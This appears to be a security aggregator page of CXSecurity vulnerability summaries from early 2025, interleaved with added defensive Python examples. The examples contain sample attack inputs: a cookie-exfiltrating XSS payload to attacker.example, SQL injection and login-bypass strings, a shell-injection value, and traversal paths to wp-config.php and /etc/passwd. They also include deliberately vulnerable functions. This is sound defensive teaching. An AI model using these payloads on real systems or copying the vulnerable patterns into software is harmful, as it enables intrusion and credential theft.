unSafe.sh
Firefox 135.0.1 bypass Download protections (PoC)
The entry describes how, with HTML and PHP code, the download protections in Firefox 135.0.1 can be bypassed to force or silently download files, and how a download loop can fill the user's default download folder.
2025-02-28 16:53:47 | Source: CXSECURITY Database RSS Feed (cxsecurity.com)
Library-Card-System V 1.0 | Add Picture/Signature - signup.php | Unrestricted File Upload | Found By Maloy Roy Orko
Library-Card-System V1.0 has an unrestricted file upload vulnerability in signup.php (the picture/signature field of the registration form), allowing a remote attacker to upload a malicious script and take over the server.
2025-02-27 17:30:51 | Source: CXSECURITY Database RSS Feed (cxsecurity.com)
Needyamin | Library-Card-System 1.0 | card.php?id= SQL Injection | Found By Maloy Roy Orko
Library-Card-System 1.0 has a SQL injection vulnerability: the `id` parameter of `card.php?id=` is passed to the database unprotected, allowing a remote attacker to dump the database by supplying a crafted parameter value.
2025-02-27 17:30:37 | Source: CXSECURITY Database RSS Feed (cxsecurity.com)
needyamin Library Card System Registration Page signup.php cross site scripting
Library-Card-System 1.0 has a stored cross-site scripting vulnerability: user input in signup.php is neither validated nor sanitized, so a remote attacker can register an account carrying an XSS payload that later executes in admindashboard.php and card.php.
2025-02-24 21:01:13 | Source: CXSECURITY Database RSS Feed (cxsecurity.com)
Image_Gallery | Add Gallery- admin/gallery.php | Unrestricted File Upload | Found By Maloy Roy Orko
needyamin image_gallery 1.0 has a critical vulnerability in the Cover Image Handler component (admin/gallery.php). Manipulating the `image` parameter allows arbitrary file upload. The vulnerability has been publicly disclosed; the vendor did not respond to the request for a fix.
2025-02-24 21:00:42 | Source: CXSECURITY Database RSS Feed (cxsecurity.com)
Image_Gallery | view.php?username= | Cross Site Scripting (Reflected XSS) | Found By Maloy Roy Orko
The `view.php?username=` parameter of the Image_Gallery application has a reflected XSS vulnerability, found by Maloy Roy Orko. An attacker can inject a malicious script to steal the administrator's cookie and take control of the server.
2025-02-24 21:00:26 | Source: CXSECURITY Database RSS Feed (cxsecurity.com)
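The stored XSS in signup.php and the reflected XSS in view.php?username= above both come down to echoing a user-controlled value into markup without encoding for the context it lands in. The following is an added Python example, not code from either application, that renders a profile fragment the unsafe way and the context-aware way (HTML text, quoted attribute, URL parameter) and shows the response headers that blunt cookie theft. The markup and header values are choices made for this example.

```python
import html
from urllib.parse import quote


def render_profile_vulnerable(username: str) -> str:
    """Markup built the way `echo $_GET['username']` would build it: no encoding."""
    return (
        f"<h1>Welcome, {username}</h1>"
        f"<a href='/view.php?username={username}'>profile</a>"
    )


def render_profile_safe(username: str) -> str:
    """Encode for each context the value lands in: HTML text, quoted attribute, URL parameter."""
    as_text = html.escape(username, quote=True)     # < > & " ' become entities
    as_param = quote(username, safe="")             # percent-encode for the query string
    return (
        f"<h1>Welcome, {as_text}</h1>"
        f'<a href="/view.php?username={as_param}">profile</a>'
    )


def hardened_headers(session_token: str) -> dict:
    """Headers that limit what an injected script can do even if one slips through.

    HttpOnly keeps the session cookie out of document.cookie; the CSP refuses
    inline script. (Policy chosen for this example.)
    """
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "Set-Cookie": f"session={session_token}; HttpOnly; Secure; SameSite=Lax; Path=/",
    }


if __name__ == "__main__":
    # Constructed cookie-stealing payload of the kind the entry describes.
    payload = "<script>location='http://attacker.example/?c='+document.cookie</script>"
    print(render_profile_vulnerable(payload))
    print(render_profile_safe(payload))
```

Escaping must be done at output time for the context in question; escaping once at registration time (as a "sanitizer") misses the attribute and URL contexts and breaks legitimate names.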
Library-Card-System | SQL Injection Admin Login Bypass In admin.php | Found By Maloy Roy Orko
Maloy Roy Orko found a SQL injection vulnerability in admin.php of Library-Card-System 1.0 that lets an attacker bypass the administrator login check and reach the admin panel.
2025-02-24 21:00:01 | Source: CXSECURITY Database RSS Feed (cxsecurity.com)
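The two Library-Card-System SQL injection entries above (database dump through `card.php?id=` and login bypass in admin.php) are the two classic outcomes of concatenating request parameters into SQL. The following is an added Python example, not the application's code, that reproduces both against an in-memory SQLite database and shows the parameterized versions. The table and column names and the sample rows are constructed for this example.

```python
import hmac
import sqlite3


def setup_db() -> sqlite3.Connection:
    """In-memory SQLite database with constructed sample rows (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE cards (id INTEGER PRIMARY KEY, name TEXT, secret TEXT);
        INSERT INTO cards VALUES (1, 'alice', 'alice-secret'), (2, 'bob', 'bob-secret');
        CREATE TABLE admins (username TEXT PRIMARY KEY, password TEXT);
        INSERT INTO admins VALUES ('admin', 'correct-horse-battery');
        """
    )
    return conn


def card_lookup_vulnerable(conn: sqlite3.Connection, card_id: str) -> list:
    # The raw query-string value becomes part of the SQL text, so the caller
    # controls the WHERE clause and can UNION in any other column.
    sql = "SELECT id, name FROM cards WHERE id = " + card_id
    return conn.execute(sql).fetchall()


def card_lookup_safe(conn: sqlite3.Connection, card_id: str) -> list:
    # Validate the type first, then bind the value; the SQL text never changes.
    if not card_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    return conn.execute(
        "SELECT id, name FROM cards WHERE id = ?", (int(card_id),)
    ).fetchall()


def admin_login_vulnerable(conn: sqlite3.Connection, user: str, pw: str) -> bool:
    # A quote in either field closes the string literal; "-- " comments out
    # the password check entirely.
    sql = (
        "SELECT COUNT(*) FROM admins WHERE username = '"
        + user + "' AND password = '" + pw + "'"
    )
    return conn.execute(sql).fetchone()[0] > 0


def admin_login_safe(conn: sqlite3.Connection, user: str, pw: str) -> bool:
    # Bound parameter for the lookup, constant-time comparison of the credential.
    # (Passwords are stored in clear only to keep the example short; a real
    # application stores and checks a password hash.)
    row = conn.execute(
        "SELECT password FROM admins WHERE username = ?", (user,)
    ).fetchone()
    return row is not None and hmac.compare_digest(row[0].encode(), pw.encode())


if __name__ == "__main__":
    db = setup_db()
    print(card_lookup_vulnerable(db, "0 UNION SELECT id, secret FROM cards"))
    print(admin_login_vulnerable(db, "admin' -- ", "wrong"))
    print(admin_login_safe(db, "admin' -- ", "wrong"))
```

The same pattern applies to PHP: `$pdo->prepare("... WHERE id = ?")` with `execute([$id])` in place of string interpolation into the query.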
Zabbix SQL Multiple Vulns
This entry describes a SQL injection vulnerability in Zabbix server (CVE-2024-42327) through which an administrator's API authentication token can be leaked and a reverse shell created for remote control.
2025-02-19 22:11:39 | Source: CXSECURITY Database RSS Feed (cxsecurity.com)
InvokeAI Remote Code Execution
This entry describes a remote code execution (RCE) vulnerability in the InvokeAI platform (CVE-2024-12029) in the `/api/v2/models/install` endpoint. An attacker can supply a malicious model file that triggers server-side deserialization and executes arbitrary code on the target. The flaw affects InvokeAI versions 4.0.0 through 5.4.2, and a Metasploit module exists for it.
2025-02-19 22:08:44 | Source: CXSECURITY Database RSS Feed (cxsecurity.com)
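The InvokeAI entry turns on deserializing an attacker-supplied model file. The following is an added Python example, not InvokeAI's code, of the generic control for pickle-based formats: an `Unpickler` whose `find_class` refuses every global not on an allow-list, so a stream that references `os.system` is rejected before anything is resolved. The allow-list and the two sample streams are constructed for this example; the forbidden sample only references `os.system` and does not execute it.

```python
import collections
import io
import os
import pickle

# Globals a checkpoint is permitted to reference. Everything else is refused
# before it is looked up. (Chosen for this example; a real loader lists exactly
# the classes its file format needs.)
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module: str, name: str):
        # pickle calls this for every GLOBAL / STACK_GLOBAL opcode, i.e. for
        # every class or function the stream wants to instantiate or call.
        if (module, name) in ALLOWED_GLOBALS:
            return getattr(__import__(module), name)   # top-level modules only
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def rejected_reason(data: bytes):
    """Return the refusal message for a stream, or None if it loads cleanly."""
    try:
        restricted_loads(data)
        return None
    except pickle.UnpicklingError as exc:
        return str(exc)


def unrestricted_resolves_os_system(data: bytes) -> bool:
    """Plain pickle.loads resolves the global and hands back the live function."""
    return pickle.loads(data) is os.system


# Constructed sample streams: a benign stand-in for a checkpoint, and a stream
# that merely *references* os.system (a real payload would call it via __reduce__).
SAMPLE_BENIGN = pickle.dumps(collections.OrderedDict(layers=2, weights=[0.1, 0.2]))
SAMPLE_FORBIDDEN = pickle.dumps(os.system)


if __name__ == "__main__":
    print(restricted_loads(SAMPLE_BENIGN))
    print(rejected_reason(SAMPLE_FORBIDDEN))
```

For PyTorch checkpoints the equivalent built-in controls are `torch.load(..., weights_only=True)` and distributing weights as safetensors, which carries no code at all; a restricted unpickler is the fallback when a pickle-based format cannot be avoided.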
BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) unauthenticated Remote Code Execution
This entry describes an unauthenticated remote code execution vulnerability in BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS), versions 24.3.1 and earlier, that chains CVE-2024-12356 (argument injection) with CVE-2025-1094 (PostgreSQL SQL injection). It lets an attacker execute arbitrary code on the target over the WebSocket protocol, and a Metasploit module implementing the chain is provided.
2025-02-19 22:07:40 | Source: CXSECURITY Database RSS Feed (cxsecurity.com)
WordPress Plugin A/B Image Optimizer 3.3 Arbitrary File Download
WordPress plugin A/B Image Optimizer, versions 3.3 and below, has a directory traversal vulnerability that lets users with Subscriber or higher privileges download arbitrary files, potentially exposing sensitive information. CVSS score: 6.5.
2025-02-18 22:26:50 | Source: CXSECURITY Database RSS Feed (cxsecurity.com)
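The A/B Image Optimizer entry is an arbitrary file download through directory traversal. The following is an added Python example, not the plugin's code, of a purely lexical path check a download handler can apply to a user-supplied file name: decode URL encoding (twice, to catch double encoding), refuse null bytes and absolute paths, normalize the path, and refuse anything that escapes the base directory. The upload directory and file names are constructed for this example.

```python
import posixpath
from urllib.parse import unquote


class PathTraversal(ValueError):
    pass


def safe_download_path(base_dir: str, requested: str) -> str:
    """Map a user-supplied relative file name onto base_dir, refusing traversal.

    Purely lexical: it never touches the filesystem. If base_dir can contain
    symlinks, also compare os.path.realpath() of the result against base_dir.
    """
    # Undo URL encoding twice: "%252e%252e" -> "%2e%2e" -> ".." is a classic
    # bypass of filters that decode once. (Legitimate names containing a
    # literal "%25" would need to be handled differently.)
    decoded = unquote(unquote(requested))
    if "\x00" in decoded:
        raise PathTraversal("null byte in path")
    decoded = decoded.replace("\\", "/")            # backslash is a separator on Windows hosts
    if decoded.startswith("/"):
        raise PathTraversal("absolute path")
    norm = posixpath.normpath(decoded)              # collapses "./" and "a/../"
    if norm in (".", "..") or norm.startswith("../"):
        raise PathTraversal(requested)
    return posixpath.join(base_dir, norm)


if __name__ == "__main__":
    base = "/var/www/wp-content/uploads"            # assumed upload directory
    print(safe_download_path(base, "2025/02/hero.jpg"))
    for bad in ["../wp-config.php", "%252e%252e%252fwp-config.php", "/etc/passwd"]:
        try:
            safe_download_path(base, bad)
        except PathTraversal as exc:
            print("rejected:", exc)
```

The path check is only half of the fix the entry implies: a download endpoint reachable by Subscriber-level users also needs a capability check (in WordPress, `current_user_can()` for a capability the feature actually requires) before it serves anything.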
OpenSSH 9.9p1 Denial of Service / Man-In-The-Middle
OpenSSH 9.9p1 has two vulnerabilities: with VerifyHostKeyDNS enabled, an attacker can impersonate the server (a man-in-the-middle against the client); and memory and CPU consumption can be driven up to cause a denial of service. One flaw stems from a long-standing code issue, the other was introduced by a newly added feature.
2025-02-18 22:25:39 | Source: CXSECURITY Database RSS Feed (cxsecurity.com)
ABB Cylon FLXeon 9.3.4 Default Credentials
ABB Cylon FLXeon 9.3.4 ships with weak default credentials. The device is used in building automation systems and supports the BACnet/IP protocol; its default administrative credentials are weak and easily guessed by a remote attacker, who then gains full control of the device.
2025-02-13 21:10:23 | Source: CXSECURITY Database RSS Feed (cxsecurity.com)
Wattsense Bridge 6.x Remote Root / Information Disclosure
Wattsense Bridge 6.x has four high-severity vulnerabilities (CVE-2025-26408 through CVE-2025-26411), covering JTAG access, serial-console login, weak passwords and plugin upload, which can lead to remote root or manipulation of the device. Users are advised to update immediately to a fixed version (6.4.1 or later) and carry out a full security review.
2025-02-13 21:09:28 | Source: CXSECURITY Database RSS Feed (cxsecurity.com)
SolarView Compact 6.00 - Command Injection
This entry covers a command injection vulnerability in SolarView Compact 6.00. An attacker can craft a malicious request to achieve remote command execution and bypass authentication. The entry lists Windows, Linux and Android (Termux) environments, presumably as the platforms the published exploit runs on.
2025-02-13 21:07:55 | Source: CXSECURITY Database RSS Feed (cxsecurity.com)
ABB Cylon FLXeon 9.3.4 (serialConfig.js) JSON Object Flooding DoS
ABB Cylon FLXeon 9.3.4 has a JSON object flooding vulnerability (serialConfig.js) affecting several controller series. An attacker can send crafted requests that exhaust memory and CPU, resulting in denial of service (DoS). Discovered by Gjoko Krstic.
2025-02-10 20:10:43 | Source: CXSECURITY Database RSS Feed (cxsecurity.com)
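A JSON flooding DoS of the kind the FLXeon entry describes works because the server parses whatever it receives into a full object tree before any limit applies. The following is an added Python example, not the controller's code (serialConfig.js is Node.js), of the guard that belongs in front of the parser: a byte limit on the body and a single linear pass over the raw text that measures nesting depth and member count before `json.loads` is allowed to build anything. The limits and the sample request body are chosen for this example.

```python
import json

MAX_BODY_BYTES = 64 * 1024      # limits chosen for this example
MAX_DEPTH = 20
MAX_MEMBERS = 200


class JsonRejected(ValueError):
    pass


def scan_structure(text: str) -> tuple:
    """One pass over raw JSON text: (max nesting depth, number of object members).

    Nothing is allocated per element; string contents are skipped so that
    brackets and colons inside strings are not counted.
    """
    depth = max_depth = members = 0
    in_str = esc = False
    for ch in text:
        if in_str:
            if esc:
                esc = False
            elif ch == "\\":
                esc = True
            elif ch == '"':
                in_str = False
            continue
        if ch == '"':
            in_str = True
        elif ch in "{[":
            depth += 1
            max_depth = max(max_depth, depth)
        elif ch in "}]":
            depth -= 1
        elif ch == ":":
            members += 1                 # exactly one ':' per object member in valid JSON
    return max_depth, members


def rejection(body: bytes):
    """Reason the body must not be parsed, or None if it is within bounds."""
    if len(body) > MAX_BODY_BYTES:
        return f"body of {len(body)} bytes exceeds {MAX_BODY_BYTES}"
    depth, members = scan_structure(body.decode("utf-8", errors="replace"))
    if depth > MAX_DEPTH:
        return f"nesting depth {depth} exceeds {MAX_DEPTH}"
    if members > MAX_MEMBERS:
        return f"{members} members exceeds {MAX_MEMBERS}"
    return None


def parse_bounded(body: bytes):
    """json.loads, but only after the structural bounds have been checked."""
    reason = rejection(body)
    if reason is not None:
        raise JsonRejected(reason)
    return json.loads(body.decode("utf-8"))


if __name__ == "__main__":
    # Constructed request body resembling a serial-port configuration.
    print(parse_bounded(b'{"ports": [{"name": "COM1", "baud": 9600}]}'))
    print(rejection(b"[" * 10_000 + b"]" * 10_000))
```

The body-size limit is the one that matters most and is best enforced by the HTTP front end (request body limit) so the flood never reaches application code; the depth and member counts catch small bodies that are still expensive to materialize.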
MySchool 1.0 SQL Injection / Code Injection / XSS / CSRF
2025-02-01 09:40:45 | Source: CXSECURITY Database RSS Feed (cxsecurity.com)
Quorum onQ OS 6.0.0.5.2064 Cross Site Scripting
Credits: Shahnawaz Shaikh, Security Researcher
2025-02-01 09:39:16 | Source: CXSECURITY Database RSS Feed (cxsecurity.com)
Xinet Elegant 6 Asset Lib Web UI 6.1.655 / SQL Injection / Exploit Update
CVSS Base Score: 7.5/1...
2025-02-01 09:37:10 | Source: CXSECURITY Database RSS Feed (cxsecurity.com)
OpenPanel 0.3.4 Command Injection
Exploit Title: OpenPanel 0.3.4 - OS Command Injection via The T...
2025-01-29 22:13:13 | Source: CXSECURITY Database RSS Feed (cxsecurity.com)
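The SolarView Compact and OpenPanel entries above are both OS command injection: a request parameter reaches a shell command line unchanged. The following is an added Python example, not code from either product, built around a timezone setting (the listing's keywords for the OpenPanel entry point at a timezone parameter; the `timedatectl` command and the zone-name pattern are assumptions for this example). It shows the vulnerable string assembly, the second-best fix of shell quoting, and the preferred fix of allow-list validation plus an argv list with no shell.

```python
import re
import shlex
import subprocess

# IANA-style zone names: "UTC", "Europe/Berlin", "America/Argentina/Buenos_Aires", "Etc/GMT+1".
# Pattern chosen for this example; a stricter check is membership in the
# installed zoneinfo database.
TZ_NAME = re.compile(r"[A-Za-z][A-Za-z0-9_+\-]*(?:/[A-Za-z0-9_+\-]+){0,2}")


def tz_command_vulnerable(tz: str) -> str:
    """The request parameter is spliced into a shell command line.

    Run with shell=True (or os.system), "Europe/Berlin; id" executes `id`.
    """
    return f"timedatectl set-timezone {tz}"


def tz_command_quoted(tz: str) -> str:
    """Second-best: shell quoting turns the whole value into one literal word."""
    return f"timedatectl set-timezone {shlex.quote(tz)}"


def tz_command_safe(tz: str) -> list:
    """Best: validate against an allow-list pattern, then build argv for a shell-free call."""
    if TZ_NAME.fullmatch(tz) is None:
        raise ValueError(f"invalid timezone name: {tz!r}")
    return ["timedatectl", "set-timezone", tz]


def apply_timezone(tz: str) -> subprocess.CompletedProcess:
    # shell=False (the default): metacharacters in tz are never interpreted,
    # and the value can only ever be one argument of timedatectl.
    return subprocess.run(tz_command_safe(tz), check=True, capture_output=True, text=True)


if __name__ == "__main__":
    injected = "Europe/Berlin; id"            # constructed injection value
    print(tz_command_vulnerable(injected))
    print(tz_command_quoted(injected))
    try:
        print(tz_command_safe(injected))
    except ValueError as exc:
        print("rejected:", exc)
```

Quoting alone still hands the value to a shell, so an allow-list on the input plus an argv call is the combination to aim for; the same applies to PHP's `escapeshellarg()` versus passing an array to `proc_open()`.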